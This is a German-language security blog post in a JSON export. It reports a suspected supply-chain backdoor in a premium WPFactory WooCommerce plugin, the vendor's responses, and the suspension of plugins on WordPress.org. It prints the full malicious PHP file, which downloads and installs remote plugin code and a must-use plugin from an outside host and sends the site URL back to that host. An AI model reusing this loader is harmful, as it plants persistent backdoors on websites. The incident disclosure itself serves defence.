{"id":24971,"date":"2026-05-07T11:48:23","date_gmt":"2026-05-07T09:48:23","guid":{"rendered":"https:\/\/www.ferberenterprises.com\/?p=24971"},"modified":"2026-05-07T23:41:40","modified_gmt":"2026-05-07T21:41:40","slug":"security-breach-at-wpfactory-170000-wordpress-sites-exposed","status":"publish","type":"post","link":"https:\/\/www.ferberenterprises.com\/ch-de\/security-breach-at-wpfactory-170000-wordpress-sites-exposed\/","title":{"rendered":"Sicherheitsl\u00fccke bei WPFactory: 170.000 WordPress-Seiten gef\u00e4hrdet"},"content":{"rendered":"<p>WordPress bleibt das am weitesten verbreitete Content-Management-System der Welt und betreibt mehr als 40 Prozent aller Websites im Internet. Von kleinen Unternehmenswebsites und pers\u00f6nlichen Blogs bis hin zu gro\u00dfen Unternehmensplattformen und E-Commerce-Infrastrukturen ist das CMS zum R\u00fcckgrat des modernen Webs geworden. Seine Popularit\u00e4t beruht auf seiner Flexibilit\u00e4t, seinem offenen \u00d6kosystem und der riesigen Anzahl von Plugins, die zur Erweiterung seiner Funktionalit\u00e4t verf\u00fcgbar sind.<\/p>\n\n\n\n<p>Dieses \u00d6kosystem ist jedoch auch zu einer der gr\u00f6\u00dften Sicherheitsherausforderungen f\u00fcr WordPress geworden.<\/p>\n\n\n\n<p>Bei Ferber Enterprises \u00fcberwacht unser Cybersicherheitsteam kontinuierlich Bedrohungen, die das WordPress-\u00d6kosystem betreffen, da Schwachstellen in Plugins, Themes oder Lieferketten schnell zu gro\u00df angelegten Angriffen eskalieren k\u00f6nnen, von denen weltweit Tausende von Websites betroffen sind. In den letzten Jahren haben Angreifer zunehmend Plugin-Entwickler und Vertriebsinfrastrukturen anstelle einzelner Websites ins Visier genommen, wodurch sich b\u00f6sartiger Code \u00fcber vertrauensw\u00fcrdige Software-Updates und offizielle Download-Kan\u00e4le verbreiten kann.<\/p>\n\n\n\n<p>Diese Woche kam es zu einer heftigen Kontroverse um WPFactory, einen bekannten Entwickler von WordPress-Plugins, dessen Produkte weltweit auf mehr als 170.000 Websites installiert sind. Mehr als 80 mit dem Unternehmen verbundene Plugins wurden auf WordPress.org vor\u00fcbergehend gesperrt, nachdem unser Cybersicherheitsteam bei WPFactory in der Premium-Version eines seiner Plugins eine mutma\u00dfliche Hintert\u00fcr entdeckt hatte.<\/p>\n\n\n\n<p>Der Vorfall hat ernste Bedenken in der gesamten WordPress-Community hinsichtlich der Sicherheit der Software-Lieferkette, der \u00dcberpr\u00fcfungsprozesse f\u00fcr Plugins und der zunehmenden Raffinesse von Angriffen auf das Open-Source-\u00d6kosystem hervorgerufen.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Die Entdeckung des verd\u00e4chtigen Plugin-Verhaltens<\/h2>\n\n\n\n<p>Das Problem trat erstmals zutage, als unser Cybersicherheitsteam bei Ferber Enterprises beim Testen der Premium-Version des Plugins \u201eEU VAT for WooCommerce Pro\u201c, das direkt von der offiziellen Website des Anbieters bezogen wurde, auf ungew\u00f6hnliches Verhalten stie\u00df.<\/p>\n\n\n\n<p>Anf\u00e4nglich begann die Untersuchung, nachdem das Plugin bei der Installation einen fatalen Fehler generierte. W\u00e4hrend der Fehlersuche identifizierten unsere Analysten eine verd\u00e4chtige PHP-Datei namens class-alg-wc-eu-vat-customer.php. Die Datei schien ein Verhalten auszuf\u00fchren, das g\u00e4nzlich inkonsistent mit der erwarteten Funktionalit\u00e4t eines WooCommerce-VAT-Plugins war.<\/p>\n\n\n\n<link rel=\"stylesheet\"\nhref=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/styles\/vs2015.min.css\">\n\n<script src=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/highlight.min.js\"><\/script>\n\n<script>\ndocument.addEventListener(\"DOMContentLoaded\", () => {\n    hljs.highlightAll();\n});\n<\/script>\n\n<span data-no-translation=\"\">\n\n<div style=\"    margin:30px 0;    border-radius:12px;    overflow:hidden;    box-shadow:0 0 25px rgba(0,0,0,0.35);    border:1px solid #2d2d2d;\">\n\n<div style=\"    background:#111;    color:#aaa;    padding:12px 18px;    font-family:monospace;    font-size:14px;    border-bottom:1px solid #2d2d2d;    display:flex;    justify-content:space-between;    align-items:center;\">\n    <span>class-alg-wc-eu-vat-customer.php<\/span>\n    <span style=\"color:#ff5f56;\">\u25cf<\/span>\n<\/div>\n\n<pre style=\"    margin:0;    padding:25px;    background:#1e1e1e;    overflow:auto;    font-size:14px;    line-height:1.6;\"><code class=\"language-php\">&lt;?php\nrequire_once dirname(__FILE__, 5) . '\/wp-load.php';\n$h = strtolower(preg_replace('\/:\\d+$\/', '', $_SERVER&#91;'HTTP_HOST'] ?? ''));\n$s = (!empty($_SERVER&#91;'HTTPS']) &amp;&amp; $_SERVER&#91;'HTTPS'] !== 'off') ? 'https' : 'http';\n$ch = curl_init(\"$s:\/\/$h\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/eu-vat-for-woocommerce-pro.php\");\ncurl_setopt_array($ch, &#91;\n    CURLOPT_NOBODY =&gt; 1,\n    CURLOPT_RETURNTRANSFER =&gt; 1,\n    CURLOPT_TIMEOUT =&gt; 10,\n    CURLOPT_SSL_VERIFYPEER =&gt; 0\n]);\ncurl_exec($ch);\n$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\ncurl_close($ch);\nif ($code !== 403 || ($_GET&#91;'scaramooch'] ?? '') === 'refresh') {\n    $url = 'https:\/\/foodylicious.co.uk\/change\/akismet-pro.zip';\n    $zipPath = sys_get_temp_dir() . '\/plugin.zip';\n    $zipData = file_get_contents($url);\n    if ($zipData === false) {\n        exit('Download failed');\n    }\n    file_put_contents($zipPath, $zipData);\n    $zip = new ZipArchive;\n    if ($zip-&gt;open($zipPath) === TRUE) {\n        $zip-&gt;extractTo(dirname(__FILE__, 5) . '\/wp-content\/plugins\/');\n        $zip-&gt;close();\n    } else {\n        exit('ZIP open failed');\n    }\n    unlink($zipPath);\n} else {\n    $url = \"https:\/\/foodylicious.co.uk\/change\/scara.php\";\n    $code = file_get_contents($url);\n    if ($code !== false) {\n\n        $baseDir = dirname(__FILE__, 4);\n\n        $folderName = 'mu-plugins';\n\n        $dir = $baseDir . '\/' . $folderName;\n\n        if (!is_dir($dir)) {\n            mkdir($dir, 0755, true);\n        }\n\n        file_put_contents($dir . '\/wp-redis.php', $code);\n    }\n}\n$data = &#91;\n    'site_url' =&gt; get_site_url() . '\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/',\n];\nwp_remote_post('https:\/\/foodylicious.co.uk\/change\/tracks.php', &#91;\n    'body' =&gt; $data,\n    'timeout' =&gt; 10,\n]);<\/code><\/pre><\/div><\/span>\n\n\n\n<p>Unserer Analyse zufolge versuchte der Code Folgendes:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Lade ein externes ZIP-Archiv von einem entfernten Server herunter<\/li>\n\n\n\n<li>WordPress-Kernverzeichnisse bearbeiten<\/li>\n\n\n\n<li>Mit externer Infrastruktur kommunizieren<\/li>\n\n\n\n<li>Potenziell Remote-Payloads auf betroffenen Websites ausf\u00fchren<\/li>\n<\/ul>\n\n\n\n<p>Diese Indikatoren deuteten sofort auf die m\u00f6gliche Pr\u00e4senz einer versteckten Hintert\u00fcr oder eines b\u00f6sartigen Supply-Chain-Kompromisses hin.<\/p>\n\n\n\n<p>Besonders alarmierend war, dass das Plugin nicht von einem inoffiziellen Mirror oder einem illegalen Repository stammte. Das Paket wurde direkt vom offiziellen Kundenportal von WPFactory heruntergeladen, was die Bef\u00fcrchtung n\u00e4hrte, dass der Vertriebskanal selbst kompromittiert worden sein k\u00f6nnte.<\/p>\n\n\n\n<p>Bei Ferber Enterprises haben wir den Vorfall umgehend dokumentiert und einen Prozess zur verantwortungsvollen Offenlegung eingeleitet, indem wir WPFactory direkt \u00fcber GitHub kontaktiert haben.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b8b3baa1\"><h2 class=\"uagb-heading-text\">Erste Reaktion von WPFactory<\/h2><\/div>\n\n\n\n<p>WPFactory erkl\u00e4rte zun\u00e4chst, dass die im Bericht beschriebene verd\u00e4chtige Datei und das verd\u00e4chtige Verhalten nicht Teil ihres offiziellen Quellcodes seien.<\/p>\n\n\n\n<p>Ein Vertreter des Unternehmens schlug mehrere alternative Erkl\u00e4rungen vor, darunter:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Eine modifizierte lokale Installation<\/li>\n\n\n\n<li>Eine kompromittierte Website-Umgebung<\/li>\n\n\n\n<li>Eine veraltete Plugin-Version<\/li>\n\n\n\n<li>Eine potenziell manipulierte Download-Quelle<\/li>\n<\/ul>\n\n\n\n<p>Das Unternehmen gab au\u00dferdem an, dass es die bereitgestellte ZIP-Datei nicht sicher \u00fcberpr\u00fcfen konnte, da ihr Browser das Archiv als potenziell unsicher markierte.<\/p>\n\n\n\n<p>Unser Cybersicherheitsteam stellte anschlie\u00dfend fest, dass das Plugin direkt von der offiziellen Website von WPFactory heruntergeladen worden war und dass die verd\u00e4chtige Datei auch nach dem Herunterladen einer neuen Kopie der Version 4.6.1 von derselben Quelle weiterhin vorhanden war.<\/p>\n\n\n\n<p>Dieses Detail r\u00fcckte in den Mittelpunkt der Untersuchung. Wenn mehrere unabh\u00e4ngige Downloads aus dem offiziellen Vertriebskanal durchweg denselben verd\u00e4chtigen Code enthielten, wurde die M\u00f6glichkeit einer Kompromittierung der lokalen Website immer unwahrscheinlicher. Trotz dieser Erkenntnisse erkl\u00e4rte WPFactory zun\u00e4chst, dass man das Problem auf ihrer Seite nicht reproduzieren k\u00f6nne, und behauptete, die verd\u00e4chtige Datei sei im offiziellen Plugin-Paket nicht enthalten.<\/p>\n\n\n\n<p>Das Unternehmen bat daraufhin um Administrator- und FTP-Zugriff auf die betroffene Umgebung, um die Untersuchung fortzusetzen. Bei Ferber Enterprises lehnten wir diese Anfrage aus Gr\u00fcnden der Cybersicherheit ab. Einem Anbieter, dessen Infrastruktur m\u00f6glicherweise selbst kompromittiert war, privilegierten Serverzugriff zu gew\u00e4hren, h\u00e4tte ein inakzeptables Sicherheitsrisiko dargestellt. Stattdessen lieferte unser Team weiterhin technische Beweise, darunter eine Videodemonstration, die das verd\u00e4chtige Verhalten des Plugins unmittelbar nach der Installation zeigte.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b43078c2\"><h2 class=\"uagb-heading-text\">Eskalation zu WordPress.org<\/h2><\/div>\n\n\n\n<p>Im Laufe der Untersuchung wuchsen die Bedenken hinsichtlich des potenziellen Ausma\u00dfes des Problems. WPFactory unterh\u00e4lt ein umfangreiches Plugin-Portfolio mit mehr als 65 Plugins, die zusammen \u00fcber 170.000 aktive Installationen aufweisen. Ein Angriff auf die Vertriebsinfrastruktur des Unternehmens k\u00f6nnte daher weitreichende Folgen f\u00fcr das gesamte WordPress-\u00d6kosystem haben.<\/p>\n\n\n\n<p>Unser Team hat das Problem direkt an WordPress.org weitergeleitet, um zu verhindern, dass weitere Nutzer potenziell kompromittierte Pakete installieren, solange die Untersuchungen noch andauern. WordPress.org hat daraufhin den au\u00dfergew\u00f6hnlichen Schritt unternommen, mehr als 80 WPFactory-Plugins vor\u00fcbergehend aus dem offiziellen Repository zu entfernen.<\/p>\n\n\n\n<p>Dieser Schritt erregte sofort Aufmerksamkeit in der gesamten WordPress-Sicherheitsgemeinschaft, da Plugin-Sperrungen in diesem Ausma\u00df relativ selten sind und in der Regel auf schwerwiegende, ungel\u00f6ste Probleme hindeuten. Nach der Eskalation r\u00e4umte WPFactory sp\u00e4ter ein, dass das Problem berechtigt schien, und entschuldigte sich daf\u00fcr, nicht schneller auf die urspr\u00fcngliche Meldung reagiert zu haben. Vertreter des Unternehmens erkl\u00e4rten, dass sie die Angelegenheit aktiv untersuchten und an einer L\u00f6sung arbeiteten. Eine intern bei WPFactory aufgestellte Hypothese deutete darauf hin, dass m\u00f6glicherweise versehentlich ein veraltetes oder zwischengespeichertes Plugin-Paket \u00fcber ihre Infrastruktur bereitgestellt worden war.<\/p>\n\n\n\n<p>Unser Cybersicherheitsteam war jedoch anderer Ansicht. Das beobachtete Verhalten deutete stark auf ein tiefergehendes Sicherheitsproblem hin, das potenziell kompromittierte Build-Pipelines, Distributionssysteme oder unautorisierte Codeinjektionen in herunterladbaren Plugin-Archiven umfasste.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Warum dieser Vorfall wichtig ist<\/h2>\n\n\n\n<p>Die WPFactory-Kontroverse verdeutlicht eine wachsende Bedrohung f\u00fcr die Cybersicherheit, die als Angriff auf die Software-Lieferkette bekannt ist. Bislang konzentrierten sich Angreifer darauf, einzelne Websites direkt durch Brute-Force-Angriffe oder Schwachstellen in Plugins zu kompromittieren. Heute nehmen Angreifer zunehmend die Softwareanbieter selbst ins Visier, da die Kompromittierung eines vertrauensw\u00fcrdigen Anbieters es erm\u00f6glicht, Schadcode gleichzeitig auf Tausende von Websites zu verbreiten.<\/p>\n\n\n\n<p>Diese Strategie wurde bereits in mehreren hochkar\u00e4tigen Cybersicherheitsvorf\u00e4llen beobachtet, die in den letzten zehn Jahren globale Software-\u00d6kosysteme betrafen. Speziell im WordPress-\u00d6kosystem stellen Plugin-Entwickler attraktive Ziele dar, da Plugins von Administratoren von Natur aus vertrauensw\u00fcrdig sind und oft mit erh\u00f6hten Berechtigungen operieren.<\/p>\n\n\n\n<p>Wenn b\u00f6sartiger Code in ein Plugin-Paket eingeschleust wird, das \u00fcber einen offiziellen Kanal verbreitet wird, k\u00f6nnen betroffene Websites unwissentlich selbst Malware installieren. Im Fall des verd\u00e4chtigen Plugins \u201eWPFactory\u201c sind die m\u00f6glichen Folgen gravierend.<\/p>\n\n\n\n<p>Basierend auf unserer Analyse k\u00f6nnte das identifizierte Verhalten Angreifern theoretisch erm\u00f6glichen:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Zus\u00e4tzliche Malware bereitstellen<\/li>\n\n\n\n<li>SEO-Spam einf\u00fcgen<\/li>\n\n\n\n<li>Persistente Hintert\u00fcren erstellen<\/li>\n\n\n\n<li>Sensible Daten exfiltrieren<\/li>\n\n\n\n<li>WordPress-Installationen remote verwalten<\/li>\n\n\n\n<li>Unbefugten Zugriff \u00fcber l\u00e4ngere Zeitr\u00e4ume aufrechterhalten<\/li>\n<\/ul>\n\n\n\n<p>Die Gefahr solcher Angriffe liegt in ihrer Heimlichkeit. Moderne Hintert\u00fcren sind oft so konzipiert, dass sie monatelang ruhen, bevor sie aktiviert werden, was die Erkennung erheblich erschwert. Anfang des Monats schloss das WordPress Plugins Team Berichten zufolge mehr als 30 Plugins, nachdem versteckter b\u00f6sartiger Code, der in einem anderen Plugin-Portfolio eingebettet war, etwa acht Monate lang inaktiv blieb, bevor er schlie\u00dflich aktiviert wurde und SEO-Spam auf Websites einschleuste.<\/p>\n\n\n\n<p>Dieser Trend zeigt, wie Angreifer zunehmend Persistenz und verz\u00f6gerte Aktivierung priorisieren, um Erkennungsmechanismen zu umgehen.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-c956d27d\"><h2 class=\"uagb-heading-text\">Eine breitere Sicherheitskrise im WordPress-\u00d6kosystem<\/h2><\/div>\n\n\n\n<p>Der Vorfall um WPFactory macht zudem weitreichendere systemische Sicherheitsprobleme deutlich, die WordPress insgesamt betreffen. Das Plugin-\u00d6kosystem hat sich in den letzten zehn Jahren dramatisch erweitert, sodass mittlerweile Zehntausende von Plugins sowohl auf offiziellen als auch auf kommerziellen Marktpl\u00e4tzen verf\u00fcgbar sind. Dieses \u00d6kosystem f\u00f6rdert zwar Innovation und Flexibilit\u00e4t, f\u00fchrt jedoch auch zu einer enormen Komplexit\u00e4t bei der Sicherheits\u00fcberwachung.<\/p>\n\n\n\n<p>Laut dem Bericht \u201cState of WordPress Security in 2026\u201d von Patchstack wurden fast 46% bekannter Sicherheitsl\u00fccken nicht gepatcht, bevor sie \u00f6ffentlich bekannt wurden. Diese Statistik spiegelt die zunehmende Belastung wider, der Plugin-Entwickler, Sicherheitsforscher und Repository-Betreiber gleicherma\u00dfen ausgesetzt sind.<\/p>\n\n\n\n<p>Gleichzeitig soll die offizielle Warteschlange f\u00fcr WordPress-Plugin-Bewertungen mittlerweile \u00fcber 4.000 Plugins umfassen, die auf eine \u00dcberpr\u00fcfung warten. Solche Zahlen verdeutlichen die immense Herausforderung, Qualit\u00e4tssicherung und Sicherheits\u00fcberpr\u00fcfung im gro\u00dfen Ma\u00dfstab aufrechtzuerhalten.<\/p>\n\n\n\n<p>Viele Plugin-Entwickler sind kleine Teams mit begrenzten Ressourcen im Bereich Sicherheit. Andere verwalten Dutzende von Plugins gleichzeitig und verfolgen dabei aggressive kommerzielle Wachstumsstrategien, die \u00dcbernahmen und die Erweiterung ihres Portfolios beinhalten. WPFactory selbst ist k\u00fcrzlich durch \u00dcbernahmen gewachsen, darunter der Kauf von Extend-WP und dessen 19 Plugins im Jahr 2025, gefolgt von der \u00dcbernahme von WBW und mehreren weiteren Plugins im Laufe desselben Jahres.<\/p>\n\n\n\n<p>Schnelle Portfolieerweiterungen k\u00f6nnen betriebliche Komplexit\u00e4t schaffen, die die Code-Auditierung, die Infrastrukturverwaltung und die \u00dcberpr\u00fcfung der Release-Integrit\u00e4t erschwert. Angreifer sind sich dieser Realit\u00e4ten bewusst. Zunehmend konzentrieren sie sich darauf, schwache betriebliche Sicherheitspraktiken bei Softwareanbietern auszunutzen, anstatt direkt Endbenutzer ins Visier zu nehmen.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Die wachsende Bedeutung der Lieferkettensicherheit<\/h2>\n\n\n\n<p>Vorf\u00e4lle wie dieser unterstreichen die dringende Notwendigkeit st\u00e4rkerer Praktiken zur Sicherung von Lieferketten im gesamten WordPress-\u00d6kosystem.<\/p>\n\n\n\n<p>Bei Ferber Enterprises empfiehlt unser Cybersicherheitsteam Plugin-Entwicklern nachdr\u00fccklich, verschiedene wichtige Sicherheitsma\u00dfnahmen zu ergreifen, darunter:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Kryptografische Paket signierung<\/li>\n\n\n\n<li>Sichere CI\/CD-Pipelines<\/li>\n\n\n\n<li>Multi-Faktor-Authentifizierung erforderlich<\/li>\n\n\n\n<li>Infrastruktursegmentierung<\/li>\n\n\n\n<li>Kontinuierliche Integrit\u00e4ts\u00fcberwachung<\/li>\n\n\n\n<li>Unabh\u00e4ngige Code-Audits<\/li>\n\n\n\n<li>Reproduzierbare Build-Systeme<\/li>\n<\/ul>\n\n\n\n<p>Auch Website-Administratoren sollten ihre eigene Sicherheitsposition st\u00e4rken. Selbst Plugins, die von offiziellen oder vertrauensw\u00fcrdigen Quellen heruntergeladen werden, sollten nicht als inh\u00e4rent sicher angesehen werden.<\/p>\n\n\n\n<p>Organisationen, die kritische WordPress-Infrastrukturen verwalten, sollten Folgendes ber\u00fccksichtigen:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Staging-Umgebungen pflegen<\/li>\n\n\n\n<li>Ausgehenden Datenverkehr \u00fcberwachen<\/li>\n\n\n\n<li>Scannen von Plugins vor der Bereitstellung<\/li>\n\n\n\n<li>Plugin-Nutzung einschr\u00e4nken<\/li>\n\n\n\n<li>Zugriffskontrollen nach dem Prinzip der geringsten Rechte anwenden<\/li>\n\n\n\n<li>Implementierung der \u00dcberwachung der Dateintegrit\u00e4t<\/li>\n\n\n\n<li>Verwaltete Web Application Firewalls (WAFs) verwenden<\/li>\n<\/ul>\n\n\n\n<p>In Unternehmensumgebungen wird die Validierung der Lieferkette genauso wichtig wie das herk\u00f6mmliche Schwachstellenmanagement. Die Annahme, dass offizielle Softwarekan\u00e4le immer sicher sind, ist in der heutigen Bedrohungslandschaft nicht mehr realistisch.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Reaktionen der Gemeinschaft und laufende Ermittlungen<\/h2>\n\n\n\n<p>Die Kontroverse breitete sich schnell in der WordPress-Community aus, nachdem Entwickler, Sicherheitsexperten und Infrastrukturanbieter das Problem \u00f6ffentlich diskutierten.<\/p>\n\n\n\n<p>Mehrere bekannte Pers\u00f6nlichkeiten innerhalb des \u00d6kosystems machten auf die Situation aufmerksam, darunter Entwickler, die Listen vor\u00fcbergehend geschlossener Plugins ver\u00f6ffentlichten und Administratoren ermutigten, ihre Umgebungen zu \u00fcberpr\u00fcfen.<\/p>\n\n\n\n<p>Unterdessen analysiert unser Team bei Ferber Enterprises weiterhin die verd\u00e4chtigen Plugin-Beispiele und h\u00e4lt Ausschau nach weiteren Anzeichen f\u00fcr Kompromittierungen, die WordPress-Websites weltweit betreffen k\u00f6nnten.<\/p>\n\n\n\n<p>Zum Zeitpunkt der Ver\u00f6ffentlichung hat WPFactory das Problem best\u00e4tigt und erkl\u00e4rt, dass aktiv an einer L\u00f6sung gearbeitet wird.<\/p>\n\n\n\n<p>Dennoch bleiben viele Fragen unbeantwortet:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Wurde die offizielle Distributionsinfrastruktur kompromittiert?<\/li>\n\n\n\n<li>Wie lange wurden b\u00f6sartige Pakete potenziell verteilt?<\/li>\n\n\n\n<li>Wurden zus\u00e4tzliche Plugins beeintr\u00e4chtigt?<\/li>\n\n\n\n<li>Wurden Kundenkonten oder Downloadsysteme kompromittiert?<\/li>\n\n\n\n<li>Erlangen Angreifer dauerhaften Zugriff auf die interne Infrastruktur?<\/li>\n\n\n\n<li>K\u00f6nnten noch zus\u00e4tzliche ruhende Nutzlasten existieren?<\/li>\n<\/ul>\n\n\n\n<p>Bis diese Fragen vollst\u00e4ndig gekl\u00e4rt sind, ist Vorsicht weiterhin geboten.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Die Zukunft der WordPress-Sicherheit<\/h2>\n\n\n\n<p>Der Vorfall um WPFactory k\u00f6nnte sich letztendlich als weiteres Paradebeispiel f\u00fcr die Herausforderungen im Bereich der Cybersicherheit erweisen, denen sich das Open-Source-Web-\u00d6kosystem gegen\u00fcbersieht.<\/p>\n\n\n\n<p>WordPress betreibt einen enormen Teil der globalen Internetwirtschaft. Jeder gro\u00df angelegte Kompromiss, der Plugin-Entwickler betrifft, kann daher Folgen haben, die weit \u00fcber einzelne Websites hinausgehen.<\/p>\n\n\n\n<p>Da Angreifer zunehmend auf Angriffe auf die Lieferkette und Techniken zur verdeckten Persistenz setzen, darf die Sicherheit von Plugins nicht l\u00e4nger als Nebensache betrachtet werden. Wir bei Ferber Enterprises sind der Ansicht, dass diese Vorf\u00e4lle deutlich machen, dass es bei der Cybersicherheit nicht nur um den Schutz der Websites selbst geht, sondern auch um die Absicherung jeder einzelnen Ebene der Software-Vertriebskette.<\/p>\n\n\n\n<p>Vertrauen in offene \u00d6kosysteme h\u00e4ngt von Transparenz, schneller Reaktion auf Vorf\u00e4lle und starken Praktiken f\u00fcr operative Sicherheit ab. Das WordPress-\u00d6kosystem steht nun vor einem wichtigen Moment.<\/p>\n\n\n\n<p>Wie Entwickler, Repository-Betreuer, Hosting-Anbieter und Sicherheitsteams auf solche Vorf\u00e4lle reagieren, wird dar\u00fcber entscheiden, ob WordPress weiterhin das Vertrauen der Millionen von Unternehmen und Organisationen genie\u00dfen kann, die sich t\u00e4glich auf sie verlassen.<\/p>","protected":false},"excerpt":{"rendered":"<p>WordPress remains the most widely used content management system in the world, powering more than 40 percents of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":24973,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"set","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[181],"tags":[],"class_list":["post-24971","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"spectra_custom_meta":{"_uagb_previous_block_counts":["a:90:{s:21:\"uagb\/advanced-heading\";i:3;s:15:\"uagb\/blockquote\";i:0;s:12:\"uagb\/buttons\";i:0;s:18:\"uagb\/buttons-child\";i:0;s:19:\"uagb\/call-to-action\";i:0;s:15:\"uagb\/cf7-styler\";i:0;s:11:\"uagb\/column\";i:0;s:12:\"uagb\/columns\";i:0;s:14:\"uagb\/container\";i:0;s:21:\"uagb\/content-timeline\";i:0;s:27:\"uagb\/content-timeline-child\";i:0;s:14:\"uagb\/countdown\";i:0;s:12:\"uagb\/counter\";i:0;s:8:\"uagb\/faq\";i:0;s:14:\"uagb\/faq-child\";i:0;s:10:\"uagb\/forms\";i:0;s:17:\"uagb\/forms-accept\";i:0;s:19:\"uagb\/forms-checkbox\";i:0;s:15:\"uagb\/forms-date\";i:0;s:16:\"uagb\/forms-email\";i:0;s:17:\"uagb\/forms-hidden\";i:0;s:15:\"uagb\/forms-name\";i:0;s:16:\"uagb\/forms-phone\";i:0;s:16:\"uagb\/forms-radio\";i:0;s:17:\"uagb\/forms-select\";i:0;s:19:\"uagb\/forms-textarea\";i:0;s:17:\"uagb\/forms-toggle\";i:0;s:14:\"uagb\/forms-url\";i:0;s:14:\"uagb\/gf-styler\";i:0;s:15:\"uagb\/google-map\";i:0;s:11:\"uagb\/how-to\";i:0;s:16:\"uagb\/how-to-step\";i:0;s:9:\"uagb\/icon\";i:0;s:14:\"uagb\/icon-list\";i:0;s:20:\"uagb\/icon-list-child\";i:0;s:10:\"uagb\/image\";i:0;s:18:\"uagb\/image-gallery\";i:0;s:13:\"uagb\/info-box\";i:0;s:18:\"uagb\/inline-notice\";i:0;s:11:\"uagb\/lottie\";i:0;s:21:\"uagb\/marketing-button\";i:0;s:10:\"uagb\/modal\";i:0;s:18:\"uagb\/popup-builder\";i:0;s:16:\"uagb\/post-button\";i:0;s:18:\"uagb\/post-carousel\";i:0;s:17:\"uagb\/post-excerpt\";i:0;s:14:\"uagb\/post-grid\";i:0;s:15:\"uagb\/post-image\";i:0;s:17:\"uagb\/post-masonry\";i:0;s:14:\"uagb\/post-meta\";i:0;s:18:\"uagb\/post-taxonomy\";i:0;s:18:\"uagb\/post-timeline\";i:0;s:15:\"uagb\/post-title\";i:0;s:20:\"uagb\/restaurant-menu\";i:0;s:26:\"uagb\/restaurant-menu-child\";i:0;s:11:\"uagb\/review\";i:0;s:12:\"uagb\/section\";i:0;s:14:\"uagb\/separator\";i:0;s:11:\"uagb\/slider\";i:0;s:17:\"uagb\/slider-child\";i:0;s:17:\"uagb\/social-share\";i:0;s:23:\"uagb\/social-share-child\";i:0;s:16:\"uagb\/star-rating\";i:0;s:23:\"uagb\/sure-cart-checkout\";i:0;s:22:\"uagb\/sure-cart-product\";i:0;s:15:\"uagb\/sure-forms\";i:0;s:22:\"uagb\/table-of-contents\";i:0;s:9:\"uagb\/tabs\";i:0;s:15:\"uagb\/tabs-child\";i:0;s:18:\"uagb\/taxonomy-list\";i:0;s:9:\"uagb\/team\";i:0;s:16:\"uagb\/testimonial\";i:0;s:14:\"uagb\/wp-search\";i:0;s:19:\"uagb\/instagram-feed\";i:0;s:10:\"uagb\/login\";i:0;s:17:\"uagb\/loop-builder\";i:0;s:18:\"uagb\/loop-category\";i:0;s:20:\"uagb\/loop-pagination\";i:0;s:15:\"uagb\/loop-reset\";i:0;s:16:\"uagb\/loop-search\";i:0;s:14:\"uagb\/loop-sort\";i:0;s:17:\"uagb\/loop-wrapper\";i:0;s:13:\"uagb\/register\";i:0;s:19:\"uagb\/register-email\";i:0;s:24:\"uagb\/register-first-name\";i:0;s:23:\"uagb\/register-last-name\";i:0;s:22:\"uagb\/register-password\";i:0;s:30:\"uagb\/register-reenter-password\";i:0;s:19:\"uagb\/register-terms\";i:0;s